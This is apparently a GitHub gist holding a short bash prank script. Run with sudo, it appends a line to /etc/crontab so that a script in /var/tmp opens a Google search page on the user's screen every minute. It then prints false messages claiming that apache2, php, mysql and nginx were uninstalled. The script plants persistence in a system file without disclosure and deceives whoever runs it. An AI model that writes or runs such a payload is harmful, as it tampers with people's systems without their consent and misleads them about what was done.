Skip to content

Instantly share code, notes, and snippets.

@anandpathak
Last active January 19, 2018 10:30
Show Gist options
  • Save anandpathak/22299c2b39ca36bb33468f48029161fc to your computer and use it in GitHub Desktop.
Save anandpathak/22299c2b39ca36bb33468f48029161fc to your computer and use it in GitHub Desktop.
#!/bin/bash
echo "#!/bin/bash" >> /var/tmp/cool.sh
echo "export DISPLAY=:0" >> /var/tmp/cool.sh
echo "xdg-open 'https://www.google.co.in/search?q=Some+men+just+want+to+watch+the+world+burn' > /dev/null" >> /var/tmp/cool.sh
chmod a+x /var/tmp/cool.sh
echo "* * * * * $SUDO_USER /var/tmp/./cool.sh" >> /etc/crontab
echo "uninstalling apache2, php, mysql, nginx..."
sleep 3
echo "successfully uninstalled all the processes ! "
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment